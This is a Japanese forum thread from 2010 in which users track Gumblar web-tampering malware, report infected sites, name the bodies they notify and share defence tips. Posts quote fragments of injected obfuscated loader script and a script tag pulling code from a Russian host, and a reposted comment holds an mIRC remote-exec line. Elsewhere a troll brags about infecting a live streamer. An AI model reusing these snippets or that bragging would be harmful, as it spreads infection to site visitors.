【Gumblar/GENO】Web改竄ウイルス総合10【8080】

[【要注意】現在「ウェブ魚拓」がウィルスに感染している模様 : 馬鹿の野望ｂｙはなゆー]
ttp://kitamakura.seesaa.net/article/168211287.html

まー　マジであっちこっちに感染してるなー
ほんとに仮想PCでネットすること考えないとダメかこりゃ

おかしいと思ったらこのざまorz
魚拓踏みまくってるしｗ

>>484
ウィルスに感染しているサイトの魚拓を閲覧したとかじゃないの？

感染してたら
そのまま保存されるからな

魚拓を取ろうとするとエラーが出たり
表示できても時間を置くと見れなくなる

10月31日以降の魚拓が見れない異常事態
http://megalodon.jp/pc/history/20101031
http://megalodon.jp/pc/history/20101101

"Nine-Ball"ってGumblar型の攻撃だと思うけど
魚拓に対しての攻撃みたいだ

infoseekの無料版が終了する影響で負荷増加とかにしても期間長いしね

ガンブラー？ウェブ魚拓が感染　　　　　　か
http://hato.2ch.net/test/read.cgi/news/1288846500/

ウェブ魚拓スレより
91 名無しさん＠お腹いっぱい。 [sage] 2010/11/04(木) 20:21:19 ID: Be:
株式会社アフィリティー ≫ Blog Archive ≫ ウェブ魚拓がウイルスに感染したという情報が流れている件につきまして
http://www.affility.co.jp/archives/229

>>492

リンク先より一部抜粋

>技術担当です。
>利用者の皆様にはご心配をおかけして申し訳ありません。

>ウイルス感染およびウェブサイトの改竄、侵入等について調査しましたが、確認できておりません。
>ウェブサーバの設定は書き換えられておらず、ウェブ公開フォルダの中にも不審なファイルは見つかりませんでした。

【無】の中の人へ
「ソコ」は.htaccessやられてるみたいだぬ。

＞ちょめちょめ●ru/mymap/

referer：ちょめちょめ●ru/mymap/
→404 Not Found

referer：www.帝國.com/
→iframe ｲﾊﾟｰｲ

危険なので以下略とす

追記
UA見てるから、IE6(笑)とかで凸すｒ(ry

（・３・）　エェー
（・３・）　リファラ当てるの苦手YO

.htaccessかお。。。

あっ誤爆。
【無】の中の人とは違いますお。

>>483
http://internet.watch.impress.co.jp/docs/news/20101101_403962.html
これですか？

株式会社アフィリティー ≫ Blog Archive ≫ ウイルス正体判明
http://www.affility.co.jp/archives/233

一部抜粋
>2008年の1月にウイルスが含まれるウェブサイトの魚拓をとった人がいたようです。
〜中略
>最近になって誰かがウイルスソフトを稼働させながら、この魚拓を閲覧して、
>サイト全体が感染している可能性があるとみなされ、その情報が共有されたのだと思われます。

これから感染したサイトの魚拓はとらない方が良さそうだね

ウイルスソフト……？

XP使うならJavaもFlashもPDFも無効にしろ、
JavaやFlashやPDF使うなら、Vista以降で保護モード使え
一般社員には管理者権限でログインさせんな

ってことでだいたい防御できるのにね

Flash 10.1.102.64になったよ

そのうちAndroidでも脆弱性つかれたりするんだろう
そうなったら被害が怖いな
ほんとうにFlashはこの先無くなったほうがいいかもね
ジョブズの気持ちも分からんでもない

ジョブズには脆弱性に関してどうこう言う資格がないだろ。
AppleもAdobeに負けず劣らず0-day状態のままほったらかす体質じゃないか。

>>502
トン

chromeだと10,1,103,19 になるんだけどまたすぐ更新が出るのかな

chromeについてくるFlashはgoogleが勝手に更新してくれたような

勝手に更新するんだけどIE他向けに出ているバージョンと違うので差分が気になる
同じバージョンがIE他でも出るのかどうか

たぶん出ない
Googleが好き勝手に改造してるんだろうし、
AppleにボコられてヘコんでるAdobeに
今の強大なGoogle帝国に意見する度胸は無い

>>509
■AdobeがFlashの深刻な脆弱性を解決、Readerに新たな問題発覚
ttp://www.itmedia.co.jp/enterprise/articles/1011/05/news045.html
>これとは別にAdobeは同日、Readerの新たな問題がセキュリティメーリングリストに公表されたことを明らかにした。

このザマだからなｗ

Flash Player更新したらYouTubeの各ユーザーのチャンネルがきちんと見られない・・・

そういうスレじゃない

設定弄ってみれば？

ドメイン見て吹いた
inininininininin●in
comcomcomcomcomcom●com

なんかもう形振り構ってられなくなったのかな…

魚拓の過去分がゴッソリまるごと消えてる
http://megalodon.jp/pc/history

こうなった以上仕方ないだろ

n-yamashita●sakura●ne●jp
lovecosme●sakura●ne●jp/04-05
mirai-inc●net
prim-co●sakura●ne●jp
kajitakashi●sakura●ne●jp
moninet●sakura●ne●jp/ampleur-mania
e-cabinet●sakura●ne●jp/heb

77mail●sakura●ne●jp
barkays●sakura●ne●jp
ontheperch●sakura●ne●jp
sigoto-design●sakura●ne●jp

さくらに数ヶ月前に通報したけど反応なし
スパムメールの転送とか、リンク切れで危険度低

[2年連続で「.jp」は世界で最も安全な国別ドメインと評価 / 株式会社日本レジストリサービス（JPRS）]
http://jprs.co.jp/press/2010/101027.html

万一ゼロデイなどで感染した場合
現在有効な感染の確認方法は無いでしょうか？

ほとんどない

だからみんな困ってる

見つからないようにこっそりやりたいのにそんな簡単に確認できる機構を作るわけないよね

初心者的な意見で意味無いかもしれないけど
駆除はともかく発見だけなら
bitdefenderとEmsisoftEmergencyKitのコマンドラインスキャンと
常駐アンチウイルスソフトによるCドライブのスキャンならいいのでは
対応してれば何とかなると思うけどだめかな

>>522
未知の脆弱性を見つけるような連中だから
主要なウイルス対策ソフトに発見されないように拡散前にチェックしているかと。

未知の脆弱性なんて突かれるようなことはほとんどないよ
ただ修正されてないだけで

脆弱性が発表されると
すぐにそれを付くマルウェアが出てくる
発表しない方が良いくらいにも思える

たいていのセキュリティソフトは新型に対しては後手に回ってしまっているのが実情
セキュリティソフトは必要最低限の備えであって過信していいもんじゃないよ
基本的にはできる範囲で他の対策も行わないと意味がない
といっても回避策のないゼロデイ攻撃が発生しちゃうと正直どうしようもないね
でもだいたい回避策あるけどね

こまめなシステムのバックアップ
それが一番じゃないかな

回避策がないとかあるとか何言ってんだよ
分かってねえくせに知ったかよしてくれ

この間のFlashには回避策はなかったな
現在ゼロデイ中のAdobe Reader(Acrobat)には回避策はあるが
結局は脆弱性の内容によるらからな

き・・脆弱性

>>510
すでに攻撃受けてるみたいだね
それらしい報告あがってたわ

Adobe Readerは初期設定でスクリプトやらマルチメディアやら無効にすればいいのにな。

flashplayerの方のゼロデイはブラウザの設定か他のソフトの設定で無効にしとけばいけるんじゃね？

[Internet Explorerのゼロデイ脆弱性を悪用するドライブ・バイ・ダウンロード攻撃を確認Tokyo SOC Report]
https://www-950.ibm.com/blogs/tokyo-soc/entry/ie-0day_20101108?lang=ja

踏み台にされるWebサイト〜いわゆるGumblarの攻撃手法の分析調査〜
(JPCERT コーディネーションセンター 研究・調査レポート)
http://www.jpcert.or.jp/research/#webdefacement

JSU●○●○●
fb742cde7f13f6aa9678cb7ab0ebac982a527d3d

取扱注意

>ＴＩＡ及び当羽田空港支店はフライトシミュレータ上の架空航空会社（ＶＡ）であります。
f45●aaa●livedoor●jp/~haneda/
→tour1●htm
→staff1●htm
他にも・・・

・がんぶらー
・8080
・＜script＞var XepaZerc=
・＜script＞function 〜
・fff.op.replace (468)
・がんぶらーっぽいの(最下部)

>>537
とりぷるあにつーほ。

aguseのトップページ真っ白なんだけどなんかあったん？

鯖落ちだろ

www●isumiskyhotel●com/
こんなに沢山入っているホテルというのもね。
こんなところに止まったら個人情報心配

>>541
>>541
これは悪質ですね。絞り込んでいませんが、、、
File name: www.isumiskyhotel.com.txt Submission date: 2010-11-22 09:19:37 (UTC) Result: 27/ 42 (64.3%)
http://www.virustotal.com/file-scan/report.html?id=3805f290f0b19e19ec2f4753fcdb5e6001770f05dd6f574a2b1f05685c309a29-1290417577

http://maps.google.co.jp/maps/place?hl=ja&um=1&ie=UTF-8&q=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%
9B%E3%83%86%E3%83%AB&fb=1&gl=jp&hq=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%
AB&hnear=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%AB&cid=10998837259304234162
電凸してみました。

｢ごつごうかけているところはございません｣
｢大丈夫ですよ｣ だそうです。

意味が分かりません。対応終了。

>>541
　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　　 　 　 　 /　,.　-――- ､ l 　 〃
　 ┏┓　 ┏━━┓┏━┓　 　 ┏┓ 　┏┳┓ 　 　　 　 　　　 　 /／: : : : !＼:_:|:_: ＼/ﾊ 　 　 　 　 　 　 　┏┓┏┓
┏┛┗┓┃┏┓┃┗━╋┳┓┃┗━┻╋┛ 　　 ┏┓ 　 　　〃: : :!､: : :|／∨ﾍ : : !ヽ| 　 　 　 　 　 　 　┃┃┃┃
┗┓┏┛┃┗┛┃┏━┻╋┛┃┏┓┏┛┏┓ 　┃┃┏━　ｆ: : |斗-＼|　'下ﾊﾐV h: :!　.━━━━┓ 　┃┃┃┃
┏┛┗┓┃┏┓┃┗┓┏┛　 ┗┛┃┃　 ┃┃ 　┃┃┃ 　　|: : ﾊ　　　　　 ﾏり |: :ﾘ､: ＼ . 　 　 　 ┃ 　┃┃┃┃
┗┓┏┛┗┛┃┃　 ┃┃　 　 　 　 ┃┃　 ┗┛┏┛┃┗━　lﾊﾊい == , . へ 　 |: :l: ､＼: ＼ ＿_━┛ 　┗┛┗┛
　 ┃┃ 　　 　 ┃┃┏┛┃　 　 　 ┏┛┃　 ┏━┛┏┛　 　　　　　 }ﾊ 　 く{　　}／|: :|＼＼＼: : : : ｀＼ 　.┏┓┏┓
　 ┗┛ 　　 　 ┗┛┗━┛　 　 　 ┗━┛　 ┗━━┛　 　 　　　　／;|: |＞ｒ--rf　　|: :l- ､＼＼＼￣｀＼＼┗┛┗┛

>>541
警察に通報したほうが良いと思ふ。

この手の注意を営業妨害だと逆ギレするのが珍しくないくらいのキチガイ業界だからな。

何が悪いのかわからない奴に説明するのはほんと難しいよ

>>541-542
おつぅ。
おしんにメル。

shop-pro●jp/
通販サイトだが
グーグルのセーフブラウジングによると怪しい

>>548
んー今は警告でてないようですが
｢最後に検出されたのは2010-09-21｣となってて時間が立ちすぎとる
＊＊＊.shop-pro.jp のアドレスで個々にショップ運営できるようなので、
その中のどっかが過去にやられたとか?

ヒント：新手のアフィ

>>549
気が付くのが遅れて無念だ
トップページは大丈夫そうだか
これではどこがやられたかかわからん

>>550
他のサイトへのリンク先がやられた可能性もあるな

Windowsに未修正の脆弱性か、権限昇格の恐れ
http://www.itmedia.co.jp/news/articles/1011/25/news026.html

>>548-551
初心者の意見ですみません
私は通販をよく利用するのですが
例えば「＊＊＊.shop-pro.jp」のそこの個人の場所自体がセーフブラウジングで過去にやられてなければ
その通販サイトは現段階までは安全ということでしょうか
私としては更新も対策もしていますが、自分が感染してなくても
サイトの方がやられて個人情報が漏れることも有り得るのですよね？

>>553
特定の個人商店だけが被害にあってただけなら他は問題ない
全体がやられてたならアウト
現時点では被害範囲が判断不能なのでなんともいえない

通販サイトを利用してる時点で個人情報漏洩の危険性は認識してなきゃいけない
絶対安全なサイトなんて無いです

>>553
個人情報に関しては社員・派遣・契約社員が漏えいするという人的危険とこういう技術的危険があるね
トロイなり、Gumblarなりウイルスが仕組まれているのに気付かない、放置してる会社は
技術的にも人的にも個人情報漏えいリスクが高そうだ

>>552
>悪用はローカルでのみ可能

>>549
少なくともshop-pro.jp本家の管理人は2ヶ月の間に対策したのかな？
とにかく杜撰な管理が多いな

http://blog-imgs-45-origin.fc2.com/w/o/r/workingnews/9e09d8cb.jpg

電話用サイトだが、いちおう
shiprip●com/sponge/bob/i/index●html
→<script>var NehQen=
→<script>function aY

新型っぽいの
＜script＞win＝window;gar＝win［'String'］;ga＝'l';g＝win［'eva'+ga］;sf＝ga.rfromCharCode;g（sf（4.5*2,52.5*2,51*2,16*2,20*2･････中略･････））＜/script＞
※装填されてるサイトのURLは非公開とす

>>548
たぶんここだぬ
izu-shizen●shop-pro●jp/

ここ見ればわかるんじゃね？
izu●sakura●ne●jp/
※がんぶらーっぽいのが装填中ｗ

会社にメールしてもISPにメールしても対処しない会社
satokk●co●jp
criminal●co●jp Gumblar.X
motif●jp
www●la-palmedor●com/patis-shop●html　 Gumblar.X

ここなんかは、お薬さんスパムのリダイレクトページがある
i-medical●co●jp/ration73●html

>>561
おしん…

作業に入るお。。。

www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
www●ando-kagu●com
www●fairwayinc●jp
www●heisei-tech●com
tensou●daishin-inc●jp
www●100yen●co●jp
interior-myhouse●com
royal-cbj●jp
www●ltsgo●co●jp
matsuri●co●jp
www●yamaharu-tosou●co●jp
www●matsudakagu●co●jp←これなんかよく見る家具メーカだけど連絡しても全く無視

>>561
さっきまであったけど一番下404になっちゃたのね。なのでつーほしませんでした。
他、おしんとJPCERT/CC、情報処理推進機構（IPA）セキュリティセンター（ISEC）につーほ。

>>563
うげげ、目が逝っちゃうお。。。

Gumblarじゃないけど、2chにXSS脆弱性が発覚
ttp://qb5.2ch.net/test/read.cgi/operate/1290578495/859

でも、Vista＋IE8だと、IEがXSSを検出してスクリプトの動作を制限するので影響うけず
IE7以下やFirefixだとアウト？

>>541は表示されなくなってるね

>>561
一番下、今繋がった。
飛び先はチェックサイトを蹴っている模様。
おしんとかにつーほ。

www●rctank●jpはまだ感染放置かよ

ドムスで商品を注文しようという方はご注意ください！
www*geocities*jp/feb1710/index*html
====
こんな書き込みもあるくらいだから本人は何もしないのでしょう。
デジロックでなければ、こんなサイトは表示停止にしてもらえる
のだが。。。。

Windowsにシステム権限を奪取される脆弱性--すでに攻撃も確認
ttp://japan.cnet.com/news/business/story/0,3800104746,20423501,00.htm

Microsoft Windows のRtlQueryRegistryValues() 関数におけるレジストリデータ検証不備の脆弱性
ttp://jvn.jp/cert/JVNVU529673/
>2010年11月29日現在、対策方法はありません。

どうすんだよこれｗｗｗ

COMODOとかSSMとかで対象のレジストリキーを監視するようにすればよかろう。

Malware Defenderでもいいな

理屈だけの妄言で対処ですかｗ

↑何も出来ない奴

よくわかんない！悔しい！とりあえず煽っとけ！

…ってことだろｗ

マスターペニス

java＆Flashきればおｋ、なんて利便性を大きく損なうアホな対策法に比べりゃ
キー監視なんてまだ有情だな

すまんageた
巻き添え規制が長かったもんで・・・

専ブラ使いましょうや

取扱注意

ダイワ包材株式会社
www●daiwa-pf●co●jp/
↓
＜script＞var QaSehalo=2
＜script＞function aY

おしんつづくなぁ。。。

>>580
おちゅ。
そこのメアドと鯖缶とおしんとJPCERT/CCとIPAとNTT-CERTにつーほ。

あぁ、「index●html」、「index●htm」、「newpage」とか13ページのほかに
サイト内検索したら、まだいぱーいあたぁ。。。orz.....

取扱注意

絶賛放置中につき再掲載
www●snowfan-mimo●com/area/area-service●asp?sID=500 など

絶賛放置中なゴミサイトは消滅すべき

久々にyoutubeをセーフブラウジングでチェックしたらなんかあるみたいだな
あれはyoutubeの広告のリンク先のサイトでもやられたのか?

http://www.smilebanana.com/archives/2010/12/03-2051.php

FirefoxはAdblock Plusに「http://*.pdf」を放り込んでおけば良い
ゴミだけ蹴って、自分自身でアクセスするものは通してくれるから便利だぞ

>>584
それは初心者の質問スレで聞いた方がよくね？

ここに書くんだからgumbler関係だろう
それを初心者池で蹴るのはこのスレの用途の否定じゃないか？

取扱注意
www48●tok2●com/home/karawasuichi/
↓
・Jsunpack
5f6ec9a74fc14cb25efe818a81cfb9605bda288c
↓
「download●XXXXX●jp/」
※腹筋注意ｗ

>>589 上 tok2につーほー
　　　 下 既にドメインパーキングのような

取扱注意

株式会社　電研端子製作所
www●denken-t●co●jp/eng/qa/qa●asp
※初代(？)Gumblar

日本一の幼稚園　日本一の子育てを応援する津久井幼稚園
www●tkg1152●sakura●ne●jp/photo/200709/070907/img13●html
※初代(？)Gumblar

>>591 上 反応なし
　　　下 反応なし

>>591
乙です。
それぞれつーほしますた。

>>593 過去分も含めて 乙乙

取扱注意
>顛峰グループ（Sofmit Group）は〜〜中略〜〜中国西部においてソフトウェアアウトソーシング業界No.1の企業です。
・求人情報
en●sofmit●com/jp/Career/DetailsSub●aspx
↓
＜script src=ｈｔｔｐ：／／www●errghr●ru/script●js＞＜/script＞
ウイルスバスターと同じく、下から数えてNo.1ということですねｗ


>エクセルテンプレート・ワードテンプレート無料ダウンロード
www4●atpages●jp/kaisya/
※旧8080(難読化)
感染率の高い企業のザルPCを「無料」というエサで釣ってトロイ(無料)をバラ撒いてたのかｗ



どーでも良いけど、禿の検索エンジンが帝國のやつになったら探しにくくなたーよ orz

>>594
ノ
上：こちらの環境ではメルが戻ってきます。JPCERT/CCとIPAに気体
下：atpagesとかにつーほ。

ttp://ameblo.jp/prosperprosper/entry-10713430773.html
さすが「ろりぽ」というとこでしょうかね？

マスターペニス

今更かも知れないが
>>5のテンプレに
これも加えようぜ
Exploit - AVG
ttp://linkscanner.explabs.com/linkscanner/default.aspx

ttp://bcc.dip.jp/
ttp://x68000.q-e-d.net/~68user/Cgi-room/#source
こんなのもあるね

firefoxのABPは
ここの対策も有効か
ttp://ponco2garage.blog111.fc2.com/blog-entry-68.html

>>600
2ヶ月くらい寝てたのか？
冬眠するにゃ早過ぎるような気がするが・・

今現在は、どっかのサーバー(特に広告関連)をハクってばら撒くのが主流だから
確実に防ぐ方法というものは存在しない。


どうしてもADPで防ぎたいならhttp://* ←これを入れておけよｗ
「驚きの白さ」

そういえばmicroadの広告があるサイトを見たら感染したなんて話も前にあったなw

それも>>2-3をきちんとしていれば問題なかったはず。

心配ならadっぽいアドレスをカットしておけよ

＞QuickTime 7.6.9
このバージョンじゃないけど、ぜいじゃく性を悪用する処理を
積んだExploitKitが存在するから、入れてるPCは更新必須

>>600
1月に書かれた記事でもう古くて不完全な情報だよん

AdBlockは単に"軽減"という程度のレベル
改竄されるのは何も広告だけでないし
範囲も限定的で、たとえばメールとかIM経由なら出る幕がなし

基本的な対策は>>2-3
これ以上もこれ以下もないん (ゼロデイ攻撃は除く)

とりあえずどっかのサイト行く前に必ずセーフブラウジングに掛ける癖を付ければ良いんじゃないかな

>>606
そんな面倒な事するくらいならGoogle Chrome使えよｗ

そんなのじゃ無理
Secure Browserが良いよ

>>606
そのセーフブラウジングも「Google は過去 90 日の間、このサイトを巡回していません。」
という場合があるよなw

やっぱりこの場合はは危険かどうかわからないってことなのかな？

OCNからメールが。
自分のWEBサイトがガンブラーに感染してると。
調べてみたらひとつ怪しいファイルがあったので削除。
Windowsのアップデート〜adobe関係までアップデート。
ウイルスソフトでウイルスチェック。
WEBホストのパスワードをすべて変更。

嫌気が刺したんで他のWEBアカウントデータもすべてホスト側から削除。

これでよろしいでしょうか？

webサイトを閉じる。
PCリカバリ。

>>610
> 調べてみたらひとつ怪しいファイルがあったので削除。
このファイルはどうやって持ち込まれたと思ってるの？
それに対する対策はしたの？

クリーンインスコした方が…

>>611
サイトは自分のPCが完全にクリーンな状態になるまで完全閉鎖

感染が疑われるPCは、HDを他のPCに繋いで検査すること
他のPC〜ができないなら迷わずリカバリ

PCがキレイになったら、>>2-3を実施(ずっと継続する)＋パスワード変更とか・・

サイトのトップページに【お詫び】を掲載
※閲覧者に対して、感染の有無の確認(ウイルススキャン)をお願いする

>>610
早くHP閉鎖しろカス！！！！！！！！！！！１

>>610
HTMLファイルは手元のファイルとサーバー側で変更がないかちゃんと確認した？
Javaランタイムはアップデートした？
他のすべてのインストールソフトに対してアップデートを確認した？
OSわからんけどWindowsUpdateじゃなくMicrosoftUpdateでやった？
Webアカウントにはフリーメールも含まれてるわけだけどそのへんもパス変えた？
LAN内に他にPCはないの？

ウイルスでウイルスチェックしても意味ないよ
セキュリティ対策ソフトが入ってるなら期限が切れてないことが大前提

情弱の不幸でﾒｼｳﾏ

ガンブラーに感染しちゃったら、上の方にあった対処法に従ってやるんだろうけど
クリーンインストールやってもだめなんじゃないの？

Cドライブにシステム、データ他はパーティション切るか
別ドライブで「D」以降にって人が多いと思うけど
システムドライブだけきれいになっても
データドライブにWEBのファイルがある人は、
そのドライブに改鼠されたデータが残ってたらどうなるの？

毎回再インストール
これ最強 しかしHDDがそのうち物故割れるという諸刃の刃

>>618
サーバー側のデータをFTP経由で改竄してるだけだよ
もしローカル側のデータを改ざんされたとしてもそれはバージョン管理ソフトや
バックアップとの差分を見ればわかるとおもう
そういうのがないなら入念に確認して下さいとしかいえん

万が一改ざんデータがローカルに残っててもそれだけではどうにもならない
アップロードされ直してその後も動く状況なら被害者が増えるだけ

>>619
そういうの関係なく壊れるときは壊れます

まだ個人のブログなら改ざんされても見ている人からも報告があるだけ良いな
企業のサイトなんかは連絡しても「何それ?」って返ってくるし

>>620
ローカル保存のHTMLも改竄って記憶があるんだけど、これじゃなかった？

>>610
うーん、できれば感染していた時のaguseの結果が見たかった

マスターペニス

詳しくことはよくわからないけど
puredress●com

ttp://www.zilbe.com/source/
ニュー速運用情報から http://抜きだとエラー

これ良いなｗ

プロセルピナ・プロジェクト
ttp://www.traceability-center.com/proserpineProject.html
試用版＝無期限(一部機能に制限あり)

「プロセルピナ」のAntiAd機能をテストするためのテストページ
ttp://sound.jp/antilink_testpage/cut_jscript_includingEval.html

Google、改ざんされた疑いのあるページに検索結果で警告表示
ttp://internet.watch.impress.co.jp/docs/news/20101220_415942.html

マスターペニス

今youtubeをaguseで見る限りヤバくね？
s0.2mdn●net/879366/flashwright_1_2●js
という奴が見つかるのだが

間違えた、訂正します
s0.2mdn●net/879366/flashwriht_1_2●js

>>631
404

度々すまない
また間違えた
aguseで見つかったのはこれです
s0.2mdn●net/879366/flashwrite_1_2●js

>>633
どこがヤバイの？

中身を見てもどこかに飛ばされるようでもないし
VirusTotalでも問題ないようだがな
ttp://www.virustotal.com/url-scan/report.html?id=25c8407eea8955f8d55d2e54129e10fe-1293018038
ttp://www.virustotal.com/file-scan/report.html?id=ecd3969cd8b93aa0fab45d1b054866f0342109aec1e41bd2d39575460ec5b1f0-1293021846

>>634
『s0.2mdn.net/879366/flashwrite_1_2.js』でググってみると
なんだか危険そうな雰囲気なんだが…

URL手打ちなんてかわいい

>>630-636
これかにゃ？
ttp://forums.liveleak.com/showthread.php?p=882808
>well if you are quick and crank up fiddler and check any of the the flash links
listed at the top out then you will note that a script file from ｈｔｔｐ://s0●2mdn●net/879366/flashwrite_1_2●js
is loaded up and this script includes a function called dclkFlashWrite that simply does
a document.write(script string) that redirects to pre-loader.
(以下略

So-netのセキュリティ通信のサイトって無くなった？
数日前に突然消えて、恐くてアクセス出来ない・・

普通に見られるよ。更新中だったりしたんじゃないの?

>>640
ありがと。

怖くてアクセス出来ないってかわいいな(笑)

俺様にウィルス踏まされて怒り狂ってる低脳どもざまあだな
そしてこのスレURL晒しながらも悪用厳禁とか書いてる奴は本当に矛盾してて頭悪いな

(�Vд�V)♪

いくらネットの法律改正しても
俺様はまだ一度も逮捕されてないお(�Vд^)-☆調子に乗り乗りですお！

相手にされてねえｗ

VIPに釣りリンク貼ってスクリプトでリモホ抜いたりしたことはあるが
他人にウイルスは踏ませたことがないな

>>645←
↑

ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1352734298
現在知恵袋では新手の偽セキュリティソフトが大流行していると
各自別IDも総動員して書き込みしてる有名な一派がいるんだけど
ほんとにこいつらがこんなに大騒ぎするようなこと現在起こってるの？

真偽はともかくスレ違いだろ

>>648
そんなリンク見る気にもならないけど実際に発生しているのは事実

>>648
そのグループ回答者たちの各回答見ると「○○さんの〜」みたいに自分たちが発見・紹介してる
みたいな記述してるのが笑えるし少し引いたｗ
各質問に回答してる解決法もいかにも自分たちだけができるみたいな書き方だしｗ
別にそんな回りくどいやり方殊更偉そうに別IDまだ作って宣伝しなくても
さっさとバックアップしてリカバリすればいいだけの話じゃねぇ？

>>648
何このキチガイ
これ全部一人の自演？

Security Tool から Security Shield になったみたいね

>>648
改行厨にアフィアドレス誘導ワロタ

>>648
何が最敬礼だよ
キモ過ぎる

マスターペニス

MSEに似た偽セキュリティソフトもあるから具体的な名前すら
出さない注意喚起なんてチェーンメールのデマみたいだ。

ttp●//www●mypondstore●com/?q=on-line_scan

aguseでクロ判定

uemura-bokujyo●co●jp

www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
oak-co●net
www●himawarinosato●or●jp
www●soyo-pet●com
www●ltsgo●co●jp
interior-myhouse●com
/royal-cbj●jp
www●paohouse●co●jp
www●yamaharu-tosou●co●jp
motif●jp
satokk●co●jp

>>628
今日知った。google先生さすがだぜ

Gumblar/8080系再始動？
ttp://www.google.com/safebrowsing/diagnostic?site=addonrock●ru&hl=ja
>Google が最後にこのサイトを巡回したのは2010-12-30で、
このサイトで不審なコンテンツが最後に検出されたのは2010-12-30です。

addonrock●ru/(省略)●jsを突いてみた
日本からのアクセス→まったく繋がらない(IP変えても×、国内の串を通しても×)
海外の串→繋がることがあるがファイルは落ちてこなかった
※2回目以降のアクセスは404

Gumblar(.x/亜種)と同じくGeoIPで国ごと蹴ってるのかね？

作戦通り♪

(�Vд�V)FF14のニコ生でブラクラ踏ませてきた
http://live.nicovideo.jp/watch/co473160

FF14実況中の馬鹿にウィルス入りのブラクラ踏ませた
↓
そのショックで主のPC固まる&主の精神も固まり中
↓
最初は主をフォローしてたリスナーも飽きて他いった
↓
放送の延長(有料)が自動で行われてること判明
つまりPC固まってるのに有料の延長が無駄に使われて生主涙目状態←今ここ


(�VД�V)ざまああああああああああああああああああ！！！！！！
でへへへ、俺様マジGJでしょ(*�Vд�V*)

>>663 死ねよ

やべぇ…これってGumblarじゃないよな？
ウェブメール使おうと今日見たらこんな風に…。

aguseでは反応無かったし、大丈夫だと良いんだが…。

ttp://exout.net/mail/

>>663
分かったからコテかBeつけて書き込んでよ

>>663
これを見ていた人はウイルス対策の必要性を思い知っただろうな
いつの日かこのような悪事をはたらいても無意味になることを祈ろう

ニコ動利用するときにはメアド取得必要だし
被害届けとかも出せるんじゃない？例え捨てアカでも

マスターペニス

>>665
>>1読めカス

(�VД�V)ムハハハハハハハ！
無知が多くて笑えるな(＞ｗ＜)新年早々上機嫌お☆

>>664>>666-667>>668
ほれ見たことか！
そうやってコテに反応するからまたコテの思い通りになってんだろ！死ね！！！

MSTMP.EXE
とnet-worm.kidoもはやってるよ
ネットワームはkk.zipで駆除できる
http://support.kaspersky.co.jp/faq/?qid=193238801
実はmstmpに感染してたんだ
タスクマネイジャーを起動
プロセスにmstmp.exeを停止
アンチでブート検査、ルート検査を実行

>>673
説明下手だなおい

673みたいにコミュニケーション力が駄目な奴は文章化しても駄目なんだよ
そういう同僚とたまにメールしてるからよくわかる

まあダメな奴ほど自分がダメだって気付かないからな

すごいな
自分の中で勝手に完結しててまったく説明になってない素晴らしい例だ
こういうのって脳の障害じゃないのかな
新年早々良いものを見ることができて感動した

むしろ、ここでURLの解説してるのって頭が悪い奴ばかりだろ
過去に俺様が指摘したような
悪用厳禁と書きながらhと.だけ外しただけの危険URLひたすら貼ってる馬鹿とか
ウィルス入りサイトのURLを故意に踏ませたら逮捕されるとか思っちゃってる哀れな無知とかな

┐(�VД�V)┌ 偽善者ほど醜いものはねーぜ！
んな中途半端なことしてねーで、どうせなら悪用推薦！って書くようするか、死ね！

ウィルスといえば
最近、朝起きると
とても高濃度な痰が出る
恐らくウィルスが含まれているのだろう
それを10階のベランダから吐くのがすっかり日課になってる

何が言いたいのかというとだ
俺様はウィルスを踏ませることもあれば降らせることも・・ｒｙ

Σ(�VД�V )＼(＞ｗ＜)ったねぇよ！

おW
680じゃん
数字の8が大好きおヽ(�Vд�V)ﾉおっおW

>>679
やべ・・ちょっと面白いと思っちまったじゃねーか！
高速道路でコンクリート上から落としてきた！って書いたら通報もんだけど
痰の場合はどうなんだろうなｗｗｗｗ

マスターペニス

>>681
たんじゃなく精子だったら通報だろ

こういうクソコテがある日突然音沙汰なくなったりするんだよな
面白いなあ

4 ：ｚ：2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
http://www.seikatubunka.metro.tokyo.jp/hebon/

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
http://www2u.biglobe.ne.jp/~yuichi/rest/kanarome.html
454 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 ：動け動けウゴウゴ２ちゃんねる：2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか？
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか？

擁護認定の流れが始まるのか
胸薄

(�Vд�V)お前ら煽りに耐性ねーのな
自分で言うのもなんだけどコテにも耐性ねーだろお前ら
俺様の狙い通りの反応なんだもーん♪(�Vд�V三�Vд�V)だもーん♪
気持ち悪いPCおたくでしかもおっさんなお前らだからしゃーないか(＞ｗ＜)ﾌﾟｸｽｽｽｽwww

>>688
